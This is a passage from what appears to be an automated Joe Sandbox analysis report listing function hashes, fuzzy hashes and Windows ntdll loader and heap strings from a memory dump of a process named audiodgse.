                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                • API String ID: 0-1334570610
                                                                                • Opcode ID: e00516a956fe6c1d8144f6c79a44f2e7e656ea4f3a6f803b8892575aa80e7eae
                                                                                • Instruction ID: f3aef46e8712ecb1c0684440e28d569756954dbeac1e97549c85b465dabef804
                                                                                • Opcode Fuzzy Hash: e00516a956fe6c1d8144f6c79a44f2e7e656ea4f3a6f803b8892575aa80e7eae
                                                                                • Instruction Fuzzy Hash: 3861D070620302DFDB29DF28C481B6ABBE1FF46704F14855DEA498B282D7B0E985CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 012D82DE
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012D82E8
                                                                                • Failed to reallocate the system dirs string !, xrefs: 012D82D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-1783798831
                                                                                • Opcode ID: 1b4c5bc5ba0be7623bc203994e7a25819de5078f9b7b9292afd6a4a4d7ed4e99
                                                                                • Instruction ID: 557681dd3138b26c1e8bab1a95e19a1b2e632c005a57f9e1af8621f8a6ebe2b1
                                                                                • Opcode Fuzzy Hash: 1b4c5bc5ba0be7623bc203994e7a25819de5078f9b7b9292afd6a4a4d7ed4e99
                                                                                • Instruction Fuzzy Hash: BE41D5B1564306EBDB25EB68D845B6F77ECEF44B60F40492AFA48D7290E770D810CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • PreferredUILanguages, xrefs: 0131C212
                                                                                • @, xrefs: 0131C1F1
                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0131C1C5
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                • API String ID: 0-2968386058
                                                                                • Opcode ID: 3001b61936aca80d30610a0c554e21bf024959bd2a0c8e1dfbbda5d8b0e7a467
                                                                                • Instruction ID: 70f732293d68e032304cc191ebccd17cd8a7be8b2b5c124f64f14cefd5f3c6c8
                                                                                • Opcode Fuzzy Hash: 3001b61936aca80d30610a0c554e21bf024959bd2a0c8e1dfbbda5d8b0e7a467
                                                                                • Instruction Fuzzy Hash: 81416072E5021AEBDF15DAD8C881FEEBBB8AB14704F14406AEA09B7284D7749A458B50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                • API String ID: 0-1373925480
                                                                                • Opcode ID: 831fa2cdf1575993d8c92e3816ff2b11d39188d061a4e3af9716da8478a47b6f
                                                                                • Instruction ID: 663553f9649f61b5cf621d5e8c8a133eb3a20967d2e91fd220f5e3f50c10f26e
                                                                                • Opcode Fuzzy Hash: 831fa2cdf1575993d8c92e3816ff2b11d39188d061a4e3af9716da8478a47b6f
                                                                                • Instruction Fuzzy Hash: 0141E231A202998BEB25EB98C844BAFFBB4FF55340F14047EDB01AB791D7B49901CB11
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • LdrpCheckRedirection, xrefs: 012E488F
                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 012E4899
                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 012E4888
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                • API String ID: 0-3154609507
                                                                                • Opcode ID: 3c50488e27ccc10b6c6f82f0f1dea79a054418029e78e4eecb6259212fd95b74
                                                                                • Instruction ID: 70f6fafb2bb7382b23c1f992f277367f8d6082c427a715382ebe5d0d04f332c5
                                                                                • Opcode Fuzzy Hash: 3c50488e27ccc10b6c6f82f0f1dea79a054418029e78e4eecb6259212fd95b74
                                                                                • Instruction Fuzzy Hash: 7841D372A203928FCB21EF1DD849A267BE5AF8AB50F85055DEE49D7251D330DC00CBC1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                • API String ID: 0-2558761708
                                                                                • Opcode ID: 5ee1dcc55d269a302f868efab10ede5f4ffb5150f2d2ccc2bbad88f5a5994492
                                                                                • Instruction ID: c47b27319cc950e6bf6068625cccba35269d1eef6047ccdfcec72d6063cf94bb
                                                                                • Opcode Fuzzy Hash: 5ee1dcc55d269a302f868efab10ede5f4ffb5150f2d2ccc2bbad88f5a5994492
                                                                                • Instruction Fuzzy Hash: 0911CD313341429FDB29DE18C482B3AF3A5EF42B15F18825DF606CB251EB70E844C754
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • LdrpInitializationFailure, xrefs: 012E20FA
                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012E2104
                                                                                • Process initialization failed with status 0x%08lx, xrefs: 012E20F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                • API String ID: 0-2986994758
                                                                                • Opcode ID: 7eee8dc2fac32b57531f11cb16b42e25a6c6269ce14ad2cb4f9b6eb1086135ba
                                                                                • Instruction ID: 7a0804a7fe8a2ef747c854bcf5d994b92e57db19fc969cc1432c484b9bda7350
                                                                                • Opcode Fuzzy Hash: 7eee8dc2fac32b57531f11cb16b42e25a6c6269ce14ad2cb4f9b6eb1086135ba
                                                                                • Instruction Fuzzy Hash: B7F0C875660319BBE724E64DDC46FA93BACEB40B54F500059F7017B286D2F0E640CA51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: #%u
                                                                                • API String ID: 48624451-232158463
                                                                                • Opcode ID: fb7a77a3c31eb309e2903cadb13020e6485811ceb8548664998194c8edb825c1
                                                                                • Instruction ID: 0524c0320ace06bd9678437ecf1612da571e689cf13ac5d4051b06039238ba99
                                                                                • Opcode Fuzzy Hash: fb7a77a3c31eb309e2903cadb13020e6485811ceb8548664998194c8edb825c1
                                                                                • Instruction Fuzzy Hash: 27715C71A2014A9FDB01DFA8C994BAFB7F8FF08704F144169EA05A7251EB34EA01CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • LdrResSearchResource Exit, xrefs: 0126AA25
                                                                                • LdrResSearchResource Enter, xrefs: 0126AA13
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                • API String ID: 0-4066393604
                                                                                • Opcode ID: 572354756570e7ec4582cf51d2f2bcfb56731bea2fc7c033ab432a8fde417c64
                                                                                • Instruction ID: fd000c38e544d7ea9c7d530596e82e15386315b07fdb608ba7e22a0ad39ce532
                                                                                • Opcode Fuzzy Hash: 572354756570e7ec4582cf51d2f2bcfb56731bea2fc7c033ab432a8fde417c64
                                                                                • Instruction Fuzzy Hash: 36E17571A2021ADFEB21CE99C940BAEBBBDFF54710F10452AEB01F7291E7749981CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `$`
                                                                                • API String ID: 0-197956300
                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                • Instruction ID: c79503ba9a236f30b491abb64232e01b3f3c204a700bc5991a72411f8701f2a5
                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                • Instruction Fuzzy Hash: 65C1EE312043529BEB24EF28C841B6BBBE5AFC4718F184A2DF696DB690D774D509CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: Legacy$UEFI
                                                                                • API String ID: 2994545307-634100481
                                                                                • Opcode ID: 0199401c7c8416c53cfbd5bccbdeb90625442c801b8788bd26d6f91716fb5436
                                                                                • Instruction ID: 2a1f018dd6926c742c3ccc49ec9628bcf3887ba7e77c29a453c146f9d147a10a
                                                                                • Opcode Fuzzy Hash: 0199401c7c8416c53cfbd5bccbdeb90625442c801b8788bd26d6f91716fb5436
                                                                                • Instruction Fuzzy Hash: 89616D71E602099FEB24DFA8C841BBEBBB9FF54700F15402DE649EB291D731A940CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$MUI
                                                                                • API String ID: 0-17815947
                                                                                • Opcode ID: 1b97318d708dd04afb78fb1364e9cabb1784bdc9f3ad6b377f5a7641327324aa
                                                                                • Instruction ID: f23d6420590ed2db6b2739bc0386d139fedf73df6f9e86daa27e1ba99ec3d957
                                                                                • Opcode Fuzzy Hash: 1b97318d708dd04afb78fb1364e9cabb1784bdc9f3ad6b377f5a7641327324aa
                                                                                • Instruction Fuzzy Hash: 30512AB1E1021DAFDB11DFA9CC90AEEBBBDEB44758F100529E611B7290D631AE05CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • kLsE, xrefs: 01260540
                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0126063D
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                • API String ID: 0-2547482624
                                                                                • Opcode ID: 27762c7f044ded0aa1f99758fa878c282d0e8ed5548998dea0db4f0a974c8a48
                                                                                • Instruction ID: aca55f9a16cdae83e610ae3317042e1e7021101d9dba2738e96f802effe83a1a
                                                                                • Opcode Fuzzy Hash: 27762c7f044ded0aa1f99758fa878c282d0e8ed5548998dea0db4f0a974c8a48
                                                                                • Instruction Fuzzy Hash: 6F51BEB15247438FD725DF68C4406A7BBE8AF84304F10483EFA9A87281E774D985DF9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0126A309
                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0126A2FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                • API String ID: 0-2876891731
                                                                                • Opcode ID: c433605119133aa5c7e2cd2791aa06223ad2b7f1579606e596457d27e052ba8b
                                                                                • Instruction ID: f25bda68fb9efd50283c374e91fe1a50e03d5b83d2adf5df65cfb912ae26e901
                                                                                • Opcode Fuzzy Hash: c433605119133aa5c7e2cd2791aa06223ad2b7f1579606e596457d27e052ba8b
                                                                                • Instruction Fuzzy Hash: 9341BE30A24646DBDB11CF59C840B6ABBB8FF85700F2441A9EB05EB291E7B5D980CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                • API String ID: 2994545307-4008356553
                                                                                • Opcode ID: b086e324c8ba5a1a04fdca92de134521cb337b4242f518fed9b6eda85b813739
                                                                                • Instruction ID: fcd8987c21576c50dfbdf77aa23215fe845a14e07d31ca46c0b75ba443e71e5c
                                                                                • Opcode Fuzzy Hash: b086e324c8ba5a1a04fdca92de134521cb337b4242f518fed9b6eda85b813739
                                                                                • Instruction Fuzzy Hash: AD01F4B2260704AFD711DF18CD46F267BE8E794B26F018939A64CC7194E374D804CB86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: MUI
                                                                                • API String ID: 0-1339004836
                                                                                • Opcode ID: 487b2c319d7f49cc9561fdee9c9837da1ae360be92ba1f72887bc173b9ee117c
                                                                                • Instruction ID: 6c4a094d80098c1d5cc74a3af71d29d5142d06a6ac8737a8a97dc5c60e417b3f
                                                                                • Opcode Fuzzy Hash: 487b2c319d7f49cc9561fdee9c9837da1ae360be92ba1f72887bc173b9ee117c
                                                                                • Instruction Fuzzy Hash: 62829E71E2025D8BDB24DFA9C8807EDBBB9FF48310F148169DA99AB291D7709D81CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: 06febf117536a55524b5e215f3946f623f02ba861c3e7f0fba353e371f2cdfb2
                                                                                • Instruction ID: bb211c769fd1039f2ba2413083f4bdb1d74301c5788aa270de10e913c33d8647
                                                                                • Opcode Fuzzy Hash: 06febf117536a55524b5e215f3946f623f02ba861c3e7f0fba353e371f2cdfb2
                                                                                • Instruction Fuzzy Hash: 12916171A6121AAFEB21EB95CC85FBEBBB9EF14B50F504065F700AB190D774E900CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                • Opcode ID: 7a27b9d5a10fe2a16c54563289d0aa62c69cb718aa667732801ff9b54b42d694
                                                                                • Instruction ID: 654dd390bb161813fbc1593ee94da14ea18ce8229653d16edeca69077ffc2ba0
                                                                                • Opcode Fuzzy Hash: 7a27b9d5a10fe2a16c54563289d0aa62c69cb718aa667732801ff9b54b42d694
                                                                                • Instruction Fuzzy Hash: 1F91AE32A0160ABFDB27ABA4DC64FAFBBBDEF45744F100429F505A7290E7749901CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: GlobalTags
                                                                                • API String ID: 0-1106856819
                                                                                • Opcode ID: d58ce4fa34522832ecc5596ef6c984d8cc40ff987eca4706180344653b680ca1
                                                                                • Instruction ID: ef57a76b430355fb915702163118f53e92f161678d732ee50ca250b2d4697cb9
                                                                                • Opcode Fuzzy Hash: d58ce4fa34522832ecc5596ef6c984d8cc40ff987eca4706180344653b680ca1
                                                                                • Instruction Fuzzy Hash: A8718FB5E2020ACFEF28CF9CC5916ADBBB1FF88700F14812EEA05A7241E7709945CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .mui
                                                                                • API String ID: 0-1199573805
                                                                                • Opcode ID: 3356e7b7d4edc66cab76b629626f156c2d9ab51196d707b54af4a4ac0f66022a
                                                                                • Instruction ID: 0a592a384f19611bc15834c3a60cf40c8878993a2e4418a1225a08e9bdf26781
                                                                                • Opcode Fuzzy Hash: 3356e7b7d4edc66cab76b629626f156c2d9ab51196d707b54af4a4ac0f66022a
                                                                                • Instruction Fuzzy Hash: DB51A772D1022A9BDF11DF9DD950AAEBBF8AF08714F054129EB11B7290D3749E41CBE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: EXT-
                                                                                • API String ID: 0-1948896318
                                                                                • Opcode ID: bf7a66875ed4e26bef35ac4154e3145cc3dc94f217dddee0e52e6bfb0be14a8d
                                                                                • Instruction ID: 090737e78a599b13643ef42de20f0c464ed45a06f2d1a004ae685d4ac691cf20
                                                                                • Opcode Fuzzy Hash: bf7a66875ed4e26bef35ac4154e3145cc3dc94f217dddee0e52e6bfb0be14a8d
                                                                                • Instruction Fuzzy Hash: BF41B1725283429BD714EA79C881B6BF7E8AF88704F450A6DFA84E7180E674D904C7A7
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BinaryHash
                                                                                • API String ID: 0-2202222882
                                                                                • Opcode ID: a155bb73a78ae047ff65557f3ee92632b38794f32eb19e438e99fe271a8fc506
                                                                                • Instruction ID: f6695d13dff7cf38c8d2984003b9b8f77d1fdb04cd8ff98d5bebe3035191ae6b
                                                                                • Opcode Fuzzy Hash: a155bb73a78ae047ff65557f3ee92632b38794f32eb19e438e99fe271a8fc506
                                                                                • Instruction Fuzzy Hash: 174145B1D5012DABDF21DA50CC85FEEB77CAB44714F4045A9E708A7140EB709E99CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #
                                                                                • API String ID: 0-1885708031
                                                                                • Opcode ID: 8f671a0d124f7b873f2ebab4dfa23e1c377cf42c104ed9c567f10c3b6e8cffca
                                                                                • Instruction ID: 220cf7fb496d11917a7a6de6b922bd4ee92d8312e49570e645dedead006b17b2
                                                                                • Opcode Fuzzy Hash: 8f671a0d124f7b873f2ebab4dfa23e1c377cf42c104ed9c567f10c3b6e8cffca
                                                                                • Instruction Fuzzy Hash: 6C312C31A2074A9BEB22DB69C854BAEFBB8DF05704F54407CEB80AB282D775DC05CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BinaryName
                                                                                • API String ID: 0-215506332
                                                                                • Opcode ID: 323ce5423195efb4b592ebec06da3e649f329a01aa33da1a214fce15c5ca53f8
                                                                                • Instruction ID: b5358286586ede0a599554c83367ff84ba0087baac3aa11c8a9618c25f8ac81b
                                                                                • Opcode Fuzzy Hash: 323ce5423195efb4b592ebec06da3e649f329a01aa33da1a214fce15c5ca53f8
                                                                                • Instruction Fuzzy Hash: CB31E376920516AFEB16DA59C845E7FFB74EB80720F11812DEA05A7250E730DE14DBE0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 012E895E
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                • API String ID: 0-702105204
                                                                                • Opcode ID: 06a282b7283bbcce6e995e5c6c79d534c30e2093ae44fbc5c3e277247009bd71
                                                                                • Instruction ID: a4577c49090bd320de8ccd180a71411f591c13669e38306ae2d528234e0efadc
                                                                                • Opcode Fuzzy Hash: 06a282b7283bbcce6e995e5c6c79d534c30e2093ae44fbc5c3e277247009bd71
                                                                                • Instruction Fuzzy Hash: 0E01F7326303069FEB356B56988CF6A7BE9EF85A94F44001CF78107751CB70B880C792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 705ae13de4ac881f1ad7a99da9bd9d32e699f64b92511662b59b77c153d26fec
                                                                                • Instruction ID: 31c1d782942bfb175766aecc461ec8676b0025c7f63ceec64d4f6586c93fe08f
                                                                                • Opcode Fuzzy Hash: 705ae13de4ac881f1ad7a99da9bd9d32e699f64b92511662b59b77c153d26fec
                                                                                • Instruction Fuzzy Hash: 0E42F6356083019FD726CF68C8A4A3BFBE5BF88708F48092DFA8697290D771D945CB52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 86096e83b25413fbded0dfd08344985b2c82627e0a95eaecb1967d9c05504298
                                                                                • Instruction ID: 09914c3b3fff5b8d64fb9ae2d7d08966accdc8b655eff51a2853da3296370fe5
                                                                                • Opcode Fuzzy Hash: 86096e83b25413fbded0dfd08344985b2c82627e0a95eaecb1967d9c05504298
                                                                                • Instruction Fuzzy Hash: 91423C75A202198FEB24CF69C841BADFBF5FF48300F1481ADEA49AB251D734A985CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41ed7dfd8bd75e3a07fab528fb98ce237e4313c2d4b1daf922fc5c74badbe831
                                                                                • Instruction ID: f319b7f625d9698451a04598a5752ba697f780834ed9aca5fc20da7d124e6d4e
                                                                                • Opcode Fuzzy Hash: 41ed7dfd8bd75e3a07fab528fb98ce237e4313c2d4b1daf922fc5c74badbe831
                                                                                • Instruction Fuzzy Hash: 2532DD70A20756CFDB25CF69C8447BABBF2BF84B04F24421DD68A9B384D775A846CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aaea33510ff8b77611377740df0e52f11e9d6cb4790f12e7a03f07a8824e09a8
                                                                                • Instruction ID: 6ba88ffdce6086ccaca4015b68abb025695dc4952f7b8cedb452e2b54d89ceaf
                                                                                • Opcode Fuzzy Hash: aaea33510ff8b77611377740df0e52f11e9d6cb4790f12e7a03f07a8824e09a8
                                                                                • Instruction Fuzzy Hash: 8822E0742047658BEB26CF2DE4A0372BBF5BF44348F08859AD9868F6C6D335E452DB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
